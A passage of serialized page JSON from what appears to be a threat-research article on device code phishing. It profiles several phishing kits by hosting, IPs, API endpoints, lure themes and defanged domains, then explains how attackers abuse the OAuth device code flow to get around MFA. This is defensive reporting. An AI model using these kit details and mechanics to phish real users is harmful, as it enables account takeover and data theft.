\u002Flanding\u002Fapi\u002Fsession-status?session_id=&token=",{"data":14791,"content":14792,"nodeType":4691},{},[14793,14803],{"data":14794,"content":14795,"nodeType":4695},{},[14796],{"data":14797,"content":14798,"nodeType":695},{},[14799],{"data":14800,"marks":14801,"value":14084,"nodeType":699},{},[14802],{"type":707},{"data":14804,"content":14805,"nodeType":4695},{},[14806],{"data":14807,"content":14808,"nodeType":695},{},[14809],{"data":14810,"marks":14811,"value":14812,"nodeType":699},{},[],"Adobe Acrobat document sharing (PDF preview, sender avatar)",{"data":14814,"content":14815,"nodeType":4691},{},[14816,14826],{"data":14817,"content":14818,"nodeType":4695},{},[14819],{"data":14820,"content":14821,"nodeType":695},{},[14822],{"data":14823,"marks":14824,"value":14307,"nodeType":699},{},[14825],{"type":707},{"data":14827,"content":14828,"nodeType":4695},{},[14829],{"data":14830,"content":14831,"nodeType":695},{},[14832],{"data":14833,"marks":14834,"value":14835,"nodeType":699},{},[],"milosh-solibella-0dcio[.]sgttommy.workers.dev",{"data":14837,"content":14841,"nodeType":1041},{"target":14838},{"sys":14839},{"id":14840,"type":1046,"linkType":1047},"6szO6IKJ32usyxIKX1efZy",[],{"data":14843,"content":14847,"nodeType":1041},{"target":14844},{"sys":14845},{"id":14846,"type":1046,"linkType":1047},"lEqV3RTMIY8y011lnhX7P",[],{"data":14849,"content":14850,"nodeType":721},{},[],{"data":14852,"content":14853,"nodeType":769},{},[14854],{"data":14855,"marks":14856,"value":14858,"nodeType":699},{},[14857],{"type":707},"“DOCUPOLL”",{"data":14860,"content":14861,"nodeType":4687},{},[14862,14885,14923,14960,14983],{"data":14863,"content":14864,"nodeType":4691},{},[14865,14875],{"data":14866,"content":14867,"nodeType":4695},{},[14868],{"data":14869,"content":14870,"nodeType":695},{},[14871],{"data":14872,"marks":14873,"value":13925,"nodeType":699},{},[14874],{"type":707},{"data":14876,"content":14877,"nodeType":4695},{},[14878],{"data":14879,"content":14880,"nodeType":695},{},[14881],{"data":14882,"marks":14883,"value":14884,"nodeType":699},{},[],"Github.io and workers.dev hosting",{"data":14886,"content":14887,"nodeType":4691},{},[14888,14898],{"data":14889,"content":14890,"nodeType":4695},{},[14891],{"data":14892,"content":14893,"nodeType":695},{},[14894],{"data":14895,"marks":14896,"value":13949,"nodeType":699},{},[14897],{"type":707},{"data":14899,"content":14900,"nodeType":4695},{},[14901,14912],{"data":14902,"content":14903,"nodeType":695},{},[14904,14908],{"data":14905,"marks":14906,"value":14423,"nodeType":699},{},[14907],{"type":707},{"data":14909,"marks":14910,"value":14911,"nodeType":699},{},[],"144.172.103.240 (FranTech Solutions \u002F RouterHosting \u002F Cloudzy AS14956)",{"data":14913,"content":14914,"nodeType":695},{},[14915,14919],{"data":14916,"marks":14917,"value":13990,"nodeType":699},{},[14918],{"type":707},{"data":14920,"marks":14921,"value":14922,"nodeType":699},{},[]," Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F70.0.3538.102 Safari\u002F537.36 Edge\u002F18.19042",{"data":14924,"content":14925,"nodeType":4691},{},[14926,14936],{"data":14927,"content":14928,"nodeType":4695},{},[14929],{"data":14930,"content":14931,"nodeType":695},{},[14932],{"data":14933,"marks":14934,"value":14032,"nodeType":699},{},[14935],{"type":707},{"data":14937,"content":14938,"nodeType":4695},{},[14939,14946,14953],{"data":14940,"content":14941,"nodeType":695},{},[14942],{"data":14943,"marks":14944,"value":14945,"nodeType":699},{},[],"POST \u002Fapi\u002Fv1\u002Flanding-pages\u002Fpublic\u002F{slug}\u002Finit",{"data":14947,"content":14948,"nodeType":695},{},[14949],{"data":14950,"marks":14951,"value":14952,"nodeType":699},{},[],"POST ...\u002Fpoll",{"data":14954,"content":14955,"nodeType":695},{},[14956],{"data":14957,"marks":14958,"value":14959,"nodeType":699},{},[],"POST ...\u002Ftrack",{"data":14961,"content":14962,"nodeType":4691},{},[14963,14973],{"data":14964,"content":14965,"nodeType":4695},{},[14966],{"data":14967,"content":14968,"nodeType":695},{},[14969],{"data":14970,"marks":14971,"value":14084,"nodeType":699},{},[14972],{"type":707},{"data":14974,"content":14975,"nodeType":4695},{},[14976],{"data":14977,"content":14978,"nodeType":695},{},[14979],{"data":14980,"marks":14981,"value":14982,"nodeType":699},{},[],"DocuSign document signing. One sample is a full scrape of real docusign.com (free-account page) with kit injected.",{"data":14984,"content":14985,"nodeType":4691},{},[14986,14996],{"data":14987,"content":14988,"nodeType":4695},{},[14989],{"data":14990,"content":14991,"nodeType":695},{},[14992],{"data":14993,"marks":14994,"value":14307,"nodeType":699},{},[14995],{"type":707},{"data":14997,"content":14998,"nodeType":4695},{},[14999],{"data":15000,"content":15001,"nodeType":695},{},[15002],{"data":15003,"marks":15004,"value":15005,"nodeType":699},{},[],"docufirmar[.]github.io",{"data":15007,"content":15011,"nodeType":1041},{"target":15008},{"sys":15009},{"id":15010,"type":1046,"linkType":1047},"6Y1XABHnQD82R3MW80HnQZ",[],{"data":15013,"content":15014,"nodeType":721},{},[],{"data":15016,"content":15017,"nodeType":769},{},[15018],{"data":15019,"marks":15020,"value":15022,"nodeType":699},{},[15021],{"type":707},"“FLOW_TOKEN”",{"data":15024,"content":15025,"nodeType":4687},{},[15026,15048,15093,15123,15146],{"data":15027,"content":15028,"nodeType":4691},{},[15029,15039],{"data":15030,"content":15031,"nodeType":4695},{},[15032],{"data":15033,"content":15034,"nodeType":695},{},[15035],{"data":15036,"marks":15037,"value":13925,"nodeType":699},{},[15038],{"type":707},{"data":15040,"content":15041,"nodeType":4695},{},[15042],{"data":15043,"content":15044,"nodeType":695},{},[15045],{"data":15046,"marks":15047,"value":14720,"nodeType":699},{},[],{"data":15049,"content":15050,"nodeType":4691},{},[15051,15061],{"data":15052,"content":15053,"nodeType":4695},{},[15054],{"data":15055,"content":15056,"nodeType":695},{},[15057],{"data":15058,"marks":15059,"value":13949,"nodeType":699},{},[15060],{"type":707},{"data":15062,"content":15063,"nodeType":4695},{},[15064,15075],{"data":15065,"content":15066,"nodeType":695},{},[15067,15071],{"data":15068,"marks":15069,"value":14423,"nodeType":699},{},[15070],{"type":707},{"data":15072,"marks":15073,"value":15074,"nodeType":699},{},[],"43.166.163.163 (Tencent Cloud AS132203)",{"data":15076,"content":15077,"nodeType":695},{},[15078,15082,15085,15089],{"data":15079,"marks":15080,"value":13990,"nodeType":699},{},[15081],{"type":707},{"data":15083,"marks":15084,"value":4535,"nodeType":699},{},[],{"data":15086,"marks":15087,"value":14762,"nodeType":699},{},[15088],{"type":707},{"data":15090,"marks":15091,"value":15092,"nodeType":699},{},[],"(null)",{"data":15094,"content":15095,"nodeType":4691},{},[15096,15106],{"data":15097,"content":15098,"nodeType":4695},{},[15099],{"data":15100,"content":15101,"nodeType":695},{},[15102],{"data":15103,"marks":15104,"value":14032,"nodeType":699},{},[15105],{"type":707},{"data":15107,"content":15108,"nodeType":4695},{},[15109,15116],{"data":15110,"content":15111,"nodeType":695},{},[15112],{"data":15113,"marks":15114,"value":15115,"nodeType":699},{},[],"POST \u002Fapi\u002Fhandler.php ",{"data":15117,"content":15118,"nodeType":695},{},[15119],{"data":15120,"marks":15121,"value":15122,"nodeType":699},{},[],"(actions: device_code_generate, device_code_poll_public)",{"data":15124,"content":15125,"nodeType":4691},{},[15126,15136],{"data":15127,"content":15128,"nodeType":4695},{},[15129],{"data":15130,"content":15131,"nodeType":695},{},[15132],{"data":15133,"marks":15134,"value":14084,"nodeType":699},{},[15135],{"type":707},{"data":15137,"content":15138,"nodeType":4695},{},[15139],{"data":15140,"content":15141,"nodeType":695},{},[15142],{"data":15143,"marks":15144,"value":15145,"nodeType":699},{},[],"DocuSign \"Salary Adjustment Document — 2026\", Microsoft banner · HR Department sender",{"data":15147,"content":15148,"nodeType":4691},{},[15149,15159],{"data":15150,"content":15151,"nodeType":4695},{},[15152],{"data":15153,"content":15154,"nodeType":695},{},[15155],{"data":15156,"marks":15157,"value":14307,"nodeType":699},{},[15158],{"type":707},{"data":15160,"content":15161,"nodeType":4695},{},[15162],{"data":15163,"content":15164,"nodeType":695},{},[15165],{"data":15166,"marks":15167,"value":15168,"nodeType":699},{},[],"salaryadjustment-2afb52.pmb6fefc52b3f9aa5c2dbf[.]workers.dev",{"data":15170,"content":15174,"nodeType":1041},{"target":15171},{"sys":15172},{"id":15173,"type":1046,"linkType":1047},"6xiTDHStbiJh7LMhjAZcPd",[],{"data":15176,"content":15177,"nodeType":721},{},[],{"data":15179,"content":15180,"nodeType":769},{},[15181],{"data":15182,"marks":15183,"value":15185,"nodeType":699},{},[15184],{"type":707},"“PAPRIKA”",{"data":15187,"content":15188,"nodeType":4687},{},[15189,15212,15235,15258],{"data":15190,"content":15191,"nodeType":4691},{},[15192,15202],{"data":15193,"content":15194,"nodeType":4695},{},[15195],{"data":15196,"content":15197,"nodeType":695},{},[15198],{"data":15199,"marks":15200,"value":13925,"nodeType":699},{},[15201],{"type":707},{"data":15203,"content":15204,"nodeType":4695},{},[15205],{"data":15206,"content":15207,"nodeType":695},{},[15208],{"data":15209,"marks":15210,"value":15211,"nodeType":699},{},[],"AWS S3 hosting",{"data":15213,"content":15214,"nodeType":4691},{},[15215,15225],{"data":15216,"content":15217,"nodeType":4695},{},[15218],{"data":15219,"content":15220,"nodeType":695},{},[15221],{"data":15222,"marks":15223,"value":14032,"nodeType":699},{},[15224],{"type":707},{"data":15226,"content":15227,"nodeType":4695},{},[15228],{"data":15229,"content":15230,"nodeType":695},{},[15231],{"data":15232,"marks":15233,"value":15234,"nodeType":699},{},[],"POST \u002Fapi\u002Fv1\u002Floader",{"data":15236,"content":15237,"nodeType":4691},{},[15238,15248],{"data":15239,"content":15240,"nodeType":4695},{},[15241],{"data":15242,"content":15243,"nodeType":695},{},[15244],{"data":15245,"marks":15246,"value":14084,"nodeType":699},{},[15247],{"type":707},{"data":15249,"content":15250,"nodeType":4695},{},[15251],{"data":15252,"content":15253,"nodeType":695},{},[15254],{"data":15255,"marks":15256,"value":15257,"nodeType":699},{},[],"MS login clone (\"Sign in to your account\"), \"Office 365\" branding, fake \"Powered by Okta\" footer",{"data":15259,"content":15260,"nodeType":4691},{},[15261,15271],{"data":15262,"content":15263,"nodeType":4695},{},[15264],{"data":15265,"content":15266,"nodeType":695},{},[15267],{"data":15268,"marks":15269,"value":14307,"nodeType":699},{},[15270],{"type":707},{"data":15272,"content":15273,"nodeType":4695},{},[15274],{"data":15275,"content":15276,"nodeType":695},{},[15277],{"data":15278,"marks":15279,"value":15280,"nodeType":699},{},[],"redirect-523346-d95027ec[.]s3.amazonaws.com",{"data":15282,"content":15286,"nodeType":1041},{"target":15283},{"sys":15284},{"id":15285,"type":1046,"linkType":1047},"6WFXqUDzcJHKWSwVIcDZAf",[],{"data":15288,"content":15289,"nodeType":721},{},[],{"data":15291,"content":15292,"nodeType":769},{},[15293],{"data":15294,"marks":15295,"value":15297,"nodeType":699},{},[15296],{"type":707},"“DCSTATUS”",{"data":15299,"content":15300,"nodeType":4687},{},[15301,15323,15346,15369],{"data":15302,"content":15303,"nodeType":4691},{},[15304,15314],{"data":15305,"content":15306,"nodeType":4695},{},[15307],{"data":15308,"content":15309,"nodeType":695},{},[15310],{"data":15311,"marks":15312,"value":13925,"nodeType":699},{},[15313],{"type":707},{"data":15315,"content":15316,"nodeType":4695},{},[15317],{"data":15318,"content":15319,"nodeType":695},{},[15320],{"data":15321,"marks":15322,"value":14208,"nodeType":699},{},[],{"data":15324,"content":15325,"nodeType":4691},{},[15326,15336],{"data":15327,"content":15328,"nodeType":4695},{},[15329],{"data":15330,"content":15331,"nodeType":695},{},[15332],{"data":15333,"marks":15334,"value":14032,"nodeType":699},{},[15335],{"type":707},{"data":15337,"content":15338,"nodeType":4695},{},[15339],{"data":15340,"content":15341,"nodeType":695},{},[15342],{"data":15343,"marks":15344,"value":15345,"nodeType":699},{},[],"GET \u002Fdc\u002Fstatus\u002F{base64url_sid}",{"data":15347,"content":15348,"nodeType":4691},{},[15349,15359],{"data":15350,"content":15351,"nodeType":4695},{},[15352],{"data":15353,"content":15354,"nodeType":695},{},[15355],{"data":15356,"marks":15357,"value":14084,"nodeType":699},{},[15358],{"type":707},{"data":15360,"content":15361,"nodeType":4695},{},[15362],{"data":15363,"content":15364,"nodeType":695},{},[15365],{"data":15366,"marks":15367,"value":15368,"nodeType":699},{},[],"Generic \"Microsoft 365 - Secure Access\" verification page",{"data":15370,"content":15371,"nodeType":4691},{},[15372,15382],{"data":15373,"content":15374,"nodeType":4695},{},[15375],{"data":15376,"content":15377,"nodeType":695},{},[15378],{"data":15379,"marks":15380,"value":14307,"nodeType":699},{},[15381],{"type":707},{"data":15383,"content":15384,"nodeType":4695},{},[15385],{"data":15386,"content":15387,"nodeType":695},{},[15388],{"data":15389,"marks":15390,"value":15391,"nodeType":699},{},[],"owa[.]apmmacleans[.]ca",{"data":15393,"content":15397,"nodeType":1041},{"target":15394},{"sys":15395},{"id":15396,"type":1046,"linkType":1047},"ugYhHeXY1lQdKooALmrIs",[],{"data":15399,"content":15400,"nodeType":721},{},[],{"data":15402,"content":15403,"nodeType":769},{},[15404],{"data":15405,"marks":15406,"value":15408,"nodeType":699},{},[15407],{"type":707},"“DOLCE”",{"data":15410,"content":15414,"nodeType":1041},{"target":15411},{"sys":15412},{"id":15413,"type":1046,"linkType":1047},"7TzU6kk01Un45NB0buEz2",[],{"data":15416,"content":15417,"nodeType":4687},{},[15418,15441,15479,15502,15525],{"data":15419,"content":15420,"nodeType":4691},{},[15421,15431],{"data":15422,"content":15423,"nodeType":4695},{},[15424],{"data":15425,"content":15426,"nodeType":695},{},[15427],{"data":15428,"marks":15429,"value":13925,"nodeType":699},{},[15430],{"type":707},{"data":15432,"content":15433,"nodeType":4695},{},[15434],{"data":15435,"content":15436,"nodeType":695},{},[15437],{"data":15438,"marks":15439,"value":15440,"nodeType":699},{},[],"Microsoft PowerApps hosting",{"data":15442,"content":15443,"nodeType":4691},{},[15444,15454],{"data":15445,"content":15446,"nodeType":4695},{},[15447],{"data":15448,"content":15449,"nodeType":695},{},[15450],{"data":15451,"marks":15452,"value":13949,"nodeType":699},{},[15453],{"type":707},{"data":15455,"content":15456,"nodeType":4695},{},[15457,15468],{"data":15458,"content":15459,"nodeType":695},{},[15460,15464],{"data":15461,"marks":15462,"value":14423,"nodeType":699},{},[15463],{"type":707},{"data":15465,"marks":15466,"value":15467,"nodeType":699},{},[],"34.53.159.84 (Google Cloud AS396982)",{"data":15469,"content":15470,"nodeType":695},{},[15471,15475],{"data":15472,"marks":15473,"value":13990,"nodeType":699},{},[15474],{"type":707},{"data":15476,"marks":15477,"value":15478,"nodeType":699},{},[]," Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F123.0.0.0 Safari\u002F537.36",{"data":15480,"content":15481,"nodeType":4691},{},[15482,15492],{"data":15483,"content":15484,"nodeType":4695},{},[15485],{"data":15486,"content":15487,"nodeType":695},{},[15488],{"data":15489,"marks":15490,"value":14032,"nodeType":699},{},[15491],{"type":707},{"data":15493,"content":15494,"nodeType":4695},{},[15495],{"data":15496,"content":15497,"nodeType":695},{},[15498],{"data":15499,"marks":15500,"value":15501,"nodeType":699},{},[],"GET \u002Fapi\u002Fgeneratecode (CloudFront)",{"data":15503,"content":15504,"nodeType":4691},{},[15505,15515],{"data":15506,"content":15507,"nodeType":4695},{},[15508],{"data":15509,"content":15510,"nodeType":695},{},[15511],{"data":15512,"marks":15513,"value":14084,"nodeType":699},{},[15514],{"type":707},{"data":15516,"content":15517,"nodeType":4695},{},[15518],{"data":15519,"content":15520,"nodeType":695},{},[15521],{"data":15522,"marks":15523,"value":15524,"nodeType":699},{},[],"Dolce & Gabbana branded, Italian language, MS account verification",{"data":15526,"content":15527,"nodeType":4691},{},[15528,15538],{"data":15529,"content":15530,"nodeType":4695},{},[15531],{"data":15532,"content":15533,"nodeType":695},{},[15534],{"data":15535,"marks":15536,"value":14307,"nodeType":699},{},[15537],{"type":707},{"data":15539,"content":15540,"nodeType":4695},{},[15541],{"data":15542,"content":15543,"nodeType":695},{},[15544],{"data":15545,"marks":15546,"value":15547,"nodeType":699},{},[],"data-migration-dolcegabbana[.]powerappsportals.com",{"data":15549,"content":15553,"nodeType":1041},{"target":15550},{"sys":15551},{"id":15552,"type":1046,"linkType":1047},"4ayQDvpf5NNOBrj9wZZRiO",[],{"data":15555,"content":15556,"nodeType":721},{},[],{"data":15558,"content":15559,"nodeType":769},{},[15560],{"data":15561,"marks":15562,"value":15564,"nodeType":699},{},[15563],{"type":707},"Venom",{"data":15566,"content":15567,"nodeType":4687},{},[15568,15591],{"data":15569,"content":15570,"nodeType":4691},{},[15571,15581],{"data":15572,"content":15573,"nodeType":4695},{},[15574],{"data":15575,"content":15576,"nodeType":695},{},[15577],{"data":15578,"marks":15579,"value":14032,"nodeType":699},{},[15580],{"type":707},{"data":15582,"content":15583,"nodeType":4695},{},[15584],{"data":15585,"content":15586,"nodeType":695},{},[15587],{"data":15588,"marks":15589,"value":15590,"nodeType":699},{},[],"POST \u002Ftoken\u002Fapi\u002Fdevice\u002Fstart\nGET \u002Ftoken\u002Fapi\u002Fdevice\u002Fstatus\u002F{sessionId}",{"data":15592,"content":15593,"nodeType":4691},{},[15594,15604],{"data":15595,"content":15596,"nodeType":4695},{},[15597],{"data":15598,"content":15599,"nodeType":695},{},[15600],{"data":15601,"marks":15602,"value":14084,"nodeType":699},{},[15603],{"type":707},{"data":15605,"content":15606,"nodeType":4695},{},[15607],{"data":15608,"content":15609,"nodeType":695},{},[15610],{"data":15611,"marks":15612,"value":15613,"nodeType":699},{},[],"Various: examples include DocuSign \"Verification\" (Microsoft sign-in pretext); DHL \"Delivery Checkpoint\" package shipment pretext",{"data":15615,"content":15619,"nodeType":1041},{"target":15616},{"sys":15617},{"id":15618,"type":1046,"linkType":1047},"79C3fces0hgTdf3G68cIrf",[],{"data":15621,"content":15622,"nodeType":721},{},[],{"data":15624,"content":15625,"nodeType":769},{},[15626],{"data":15627,"marks":15628,"value":15630,"nodeType":699},{},[15629],{"type":707},"Tycoon2FA",{"data":15632,"content":15633,"nodeType":4687},{},[15634,15664,15701,15724,15747],{"data":15635,"content":15636,"nodeType":4691},{},[15637,15647],{"data":15638,"content":15639,"nodeType":4695},{},[15640],{"data":15641,"content":15642,"nodeType":695},{},[15643],{"data":15644,"marks":15645,"value":13925,"nodeType":699},{},[15646],{"type":707},{"data":15648,"content":15649,"nodeType":4695},{},[15650,15657],{"data":15651,"content":15652,"nodeType":695},{},[15653],{"data":15654,"marks":15655,"value":15656,"nodeType":699},{},[],"Github.io and Cloudflare Workers (workers.dev) hosting",{"data":15658,"content":15659,"nodeType":695},{},[15660],{"data":15661,"marks":15662,"value":15663,"nodeType":699},{},[],"Compromised-site landing pages and CF Workers (*.workers.dev) used as frontends; victim email passed in URL as last path segment ($base64) or ?acct\u002F?encoded query",{"data":15665,"content":15666,"nodeType":4691},{},[15667,15677],{"data":15668,"content":15669,"nodeType":4695},{},[15670],{"data":15671,"content":15672,"nodeType":695},{},[15673],{"data":15674,"marks":15675,"value":13949,"nodeType":699},{},[15676],{"type":707},{"data":15678,"content":15679,"nodeType":4695},{},[15680,15691],{"data":15681,"content":15682,"nodeType":695},{},[15683,15687],{"data":15684,"marks":15685,"value":14423,"nodeType":699},{},[15686],{"type":707},{"data":15688,"marks":15689,"value":15690,"nodeType":699},{},[],"47.253.5.88 (Alibaba Cloud)",{"data":15692,"content":15693,"nodeType":695},{},[15694,15698],{"data":15695,"marks":15696,"value":13990,"nodeType":699},{},[15697],{"type":707},{"data":15699,"marks":15700,"value":14247,"nodeType":699},{},[],{"data":15702,"content":15703,"nodeType":4691},{},[15704,15714],{"data":15705,"content":15706,"nodeType":4695},{},[15707],{"data":15708,"content":15709,"nodeType":695},{},[15710],{"data":15711,"marks":15712,"value":14032,"nodeType":699},{},[15713],{"type":707},{"data":15715,"content":15716,"nodeType":4695},{},[15717],{"data":15718,"content":15719,"nodeType":695},{},[15720],{"data":15721,"marks":15722,"value":15723,"nodeType":699},{},[],"GET \u002Fapi\u002Fsession\u002F{UUIDv4} polled with header X-API-Key: \u003Cprefix>_\u003C64-hex> (key materialised at runtime via atob(window.__cyb3r.k)) \nPOST \u002Fapi\u002Fdevice-code with body {\"prt_foci_session_id\": \"\u003CUUID>\"} (second-stage code retrieval after initial session error)",{"data":15725,"content":15726,"nodeType":4691},{},[15727,15737],{"data":15728,"content":15729,"nodeType":4695},{},[15730],{"data":15731,"content":15732,"nodeType":695},{},[15733],{"data":15734,"marks":15735,"value":14084,"nodeType":699},{},[15736],{"type":707},{"data":15738,"content":15739,"nodeType":4695},{},[15740],{"data":15741,"content":15742,"nodeType":695},{},[15743],{"data":15744,"marks":15745,"value":15746,"nodeType":699},{},[],"Various: SharePoint \"Remittance Advice\"; Microsoft 365 generic sign-in; Microsoft 365 Voicemail (.mp3 attachment); OneDrive \"Shared file\"; German \"Sicheres Dokumentenportal\" PDF lure",{"data":15748,"content":15749,"nodeType":4691},{},[15750,15760],{"data":15751,"content":15752,"nodeType":4695},{},[15753],{"data":15754,"content":15755,"nodeType":695},{},[15756],{"data":15757,"marks":15758,"value":14307,"nodeType":699},{},[15759],{"type":707},{"data":15761,"content":15762,"nodeType":4695},{},[15763],{"data":15764,"content":15765,"nodeType":695},{},[15766],{"data":15767,"marks":15768,"value":15769,"nodeType":699},{},[],"afriqbeauglobal[.]com\u002Fhomepage\u002Findex[.]html",{"data":15771,"content":15774,"nodeType":1041},{"target":15772},{"sys":15773},{"id":2858,"type":1046,"linkType":1047},[],{"data":15776,"content":15777,"nodeType":721},{},[],{"data":15779,"content":15780,"nodeType":769},{},[15781],{"data":15782,"marks":15783,"value":15785,"nodeType":699},{},[15784],{"type":707},"\"CYB3R\"",{"data":15787,"content":15788,"nodeType":4687},{},[15789,15812,15850,15872,15895],{"data":15790,"content":15791,"nodeType":4691},{},[15792,15802],{"data":15793,"content":15794,"nodeType":4695},{},[15795],{"data":15796,"content":15797,"nodeType":695},{},[15798],{"data":15799,"marks":15800,"value":13925,"nodeType":699},{},[15801],{"type":707},{"data":15803,"content":15804,"nodeType":4695},{},[15805],{"data":15806,"content":15807,"nodeType":695},{},[15808],{"data":15809,"marks":15810,"value":15811,"nodeType":699},{},[],"Cloudflare Workers (workers.dev) hosting",{"data":15813,"content":15814,"nodeType":4691},{},[15815,15825],{"data":15816,"content":15817,"nodeType":4695},{},[15818],{"data":15819,"content":15820,"nodeType":695},{},[15821],{"data":15822,"marks":15823,"value":13949,"nodeType":699},{},[15824],{"type":707},{"data":15826,"content":15827,"nodeType":4695},{},[15828,15839],{"data":15829,"content":15830,"nodeType":695},{},[15831,15835],{"data":15832,"marks":15833,"value":14423,"nodeType":699},{},[15834],{"type":707},{"data":15836,"marks":15837,"value":15838,"nodeType":699},{},[],"2400:8d60:2::1:c116:843e (Evoxt VPS)",{"data":15840,"content":15841,"nodeType":695},{},[15842,15846],{"data":15843,"marks":15844,"value":13990,"nodeType":699},{},[15845],{"type":707},{"data":15847,"marks":15848,"value":15849,"nodeType":699},{},[]," axios\u002F1.13.6",{"data":15851,"content":15852,"nodeType":4691},{},[15853,15863],{"data":15854,"content":15855,"nodeType":4695},{},[15856],{"data":15857,"content":15858,"nodeType":695},{},[15859],{"data":15860,"marks":15861,"value":14032,"nodeType":699},{},[15862],{"type":707},{"data":15864,"content":15865,"nodeType":4695},{},[15866],{"data":15867,"content":15868,"nodeType":695},{},[15869],{"data":15870,"marks":15871,"value":15723,"nodeType":699},{},[],{"data":15873,"content":15874,"nodeType":4691},{},[15875,15885],{"data":15876,"content":15877,"nodeType":4695},{},[15878],{"data":15879,"content":15880,"nodeType":695},{},[15881],{"data":15882,"marks":15883,"value":14084,"nodeType":699},{},[15884],{"type":707},{"data":15886,"content":15887,"nodeType":4695},{},[15888],{"data":15889,"content":15890,"nodeType":695},{},[15891],{"data":15892,"marks":15893,"value":15894,"nodeType":699},{},[],"DocuSign in Spanish (\"Documento Firmar — COTIZACIÓN\u002FESTIMACIÓN.pdf\", \"Complete su firma\", \"Verifique su identidad\", \"Continuar a Microsoft\").",{"data":15896,"content":15897,"nodeType":4691},{},[15898,15908],{"data":15899,"content":15900,"nodeType":4695},{},[15901],{"data":15902,"content":15903,"nodeType":695},{},[15904],{"data":15905,"marks":15906,"value":14307,"nodeType":699},{},[15907],{"type":707},{"data":15909,"content":15910,"nodeType":4695},{},[15911],{"data":15912,"content":15913,"nodeType":695},{},[15914],{"data":15915,"marks":15916,"value":15917,"nodeType":699},{},[],"muzagestion[.]secure-share[.]workers.dev",{"data":15919,"content":15923,"nodeType":1041},{"target":15920},{"sys":15921},{"id":15922,"type":1046,"linkType":1047},"5EU0QNteiQcYybKG1W1cS3",[],{"data":15925,"content":15926,"nodeType":721},{},[],{"data":15928,"content":15929,"nodeType":725},{},[15930],{"data":15931,"marks":15932,"value":15934,"nodeType":699},{},[15933],{"type":707},"Device code phishing under the hood",{"data":15936,"content":15937,"nodeType":695},{},[15938,15942],{"data":15939,"marks":15940,"value":15941,"nodeType":699},{},[],"The attacker POSTs to the authorization server's device authorization endpoint with its client_id (i.e. an application ID) and requested scopes or resources. The server responds with a device_code (used for polling), a user_code, a verification_uri, an expires_in value, and a polling interval. The user visits the URL, enters the code and approves the request. Meanwhile, the device polls the token endpoint. Once approved, the server returns an access token, a refresh token (if offline_access was requested), and an ID token (if openid was included). ",{"data":15943,"marks":15944,"value":15946,"nodeType":699},{},[15945],{"type":707},"The attacker now has API access to the victim's account. ",{"data":15948,"content":15949,"nodeType":695},{},[15950],{"data":15951,"marks":15952,"value":15953,"nodeType":699},{},[],"Broadly, this gives the attacker a comparable level of control to a “normal” phishing attack (with conditions based on the scopes granted and specific app being targeted) while API access grants additional capabilities beyond standard browser sessions. When combined with other techniques, this access can be exchanged to open normal browser app sessions and access SSO connected apps.",{"data":15955,"content":15959,"nodeType":1041},{"target":15956},{"sys":15957},{"id":15958,"type":1046,"linkType":1047},"4WtQR2xsE236yoyhSXj58Z",[],{"data":15961,"content":15965,"nodeType":1041},{"target":15962},{"sys":15963},{"id":15964,"type":1046,"linkType":1047},"1x7Lip7JdY2xlHKKurT7qJ",[],{"data":15967,"content":15968,"nodeType":695},{},[15969],{"data":15970,"marks":15971,"value":15972,"nodeType":699},{},[],"At this point, you can achieve a number of objectives both inside the app ecosystem and across SSO connected apps — e.g. data theft, disruption, and ultimately extortion.",{"data":15974,"content":15975,"nodeType":695},{},[15976,15980,15985,15989],{"data":15977,"marks":15978,"value":15979,"nodeType":699},{},[],"Critically, the initial request to generate a device code is typically ",{"data":15981,"marks":15982,"value":15984,"nodeType":699},{},[15983],{"type":707},"unauthenticated",{"data":15986,"marks":15987,"value":15988,"nodeType":699},{},[]," across all providers — ",{"data":15990,"marks":15991,"value":15993,"nodeType":699},{},[15992],{"type":707},"anyone can generate one, from any machine, without proving any relationship to the target organization.",{"data":15995,"content":15996,"nodeType":695},{},[15997,16001,16006],{"data":15998,"marks":15999,"value":16000,"nodeType":699},{},[],"So, the attacker has to deliver a set of instructions via a phishing channel (e.g. email, social media DM, corp IM platform, and so on) with a device code that they have generated. The victim then enters this code on the ",{"data":16002,"marks":16003,"value":16005,"nodeType":699},{},[16004],{"type":707},"legitimate device code login page",{"data":16007,"marks":16008,"value":16009,"nodeType":699},{},[]," for that app and issues the tokens to the attacker.",{"data":16011,"content":16015,"nodeType":1041},{"target":16012},{"sys":16013},{"id":16014,"type":1046,"linkType":1047},"1txUYuQjH9FlbDGTo8AbZB",[],{"data":16017,"content":16018,"nodeType":721},{},[],{"data":16020,"content":16021,"nodeType":725},{},[16022],{"data":16023,"marks":16024,"value":16026,"nodeType":699},{},[16025],{"type":707},"Why device code phishing is so dangerous",{"data":16028,"content":16029,"nodeType":769},{},[16030],{"data":16031,"marks":16032,"value":16034,"nodeType":699},{},[16033],{"type":707},"Device code phishing bypasses authentication controls (including passkeys)",{"data":16036,"content":16037,"nodeType":695},{},[16038,16042,16047,16051],{"data":16039,"marks":16040,"value":16041,"nodeType":699},{},[],"A device code phishing attack ",{"data":16043,"marks":16044,"value":16046,"nodeType":699},{},[16045],{"type":707},"cannot be prevented with authentication controls",{"data":16048,"marks":16049,"value":16050,"nodeType":699},{},[],". This includes all forms of MFA and ",{"data":16052,"marks":16053,"value":16055,"nodeType":699},{},[16054],{"type":707},"even “phishing-resistant” authentication methods such as passkeys. ",{"data":16057,"content":16058,"nodeType":695},{},[16059,16064,16068,16073],{"data":16060,"marks":16061,"value":16063,"nodeType":699},{},[16062],{"type":707},"The device code authorization is effectively performed post-authentication. ",{"data":16065,"marks":16066,"value":16067,"nodeType":699},{},[],"If you already have an active session in your browser, entering the device code and selecting your account from a drop-down menu is all that's needed. ",{"data":16069,"marks":16070,"value":16072,"nodeType":699},{},[16071],{"type":707},"No password or MFA required. ",{"data":16074,"marks":16075,"value":16076,"nodeType":699},{},[],"You can see an example in the video below.",{"data":16078,"content":16081,"nodeType":1041},{"target":16079},{"sys":16080},{"id":15010,"type":1046,"linkType":1047},[],{"data":16083,"content":16084,"nodeType":695},{},[16085],{"data":16086,"marks":16087,"value":16088,"nodeType":699},{},[],"Even if you do have to sign in again (because you're not already signed in for some reason), the attack still works because it isn't targeting the login — it's targeting the authorization layer instead.",{"data":16090,"content":16091,"nodeType":695},{},[16092],{"data":16093,"marks":16094,"value":16095,"nodeType":699},{},[],"This is what makes device code phishing different to other standard phishing methods like AiTM phishing (and arguably even more effective in environments with strict identity control enforcement). 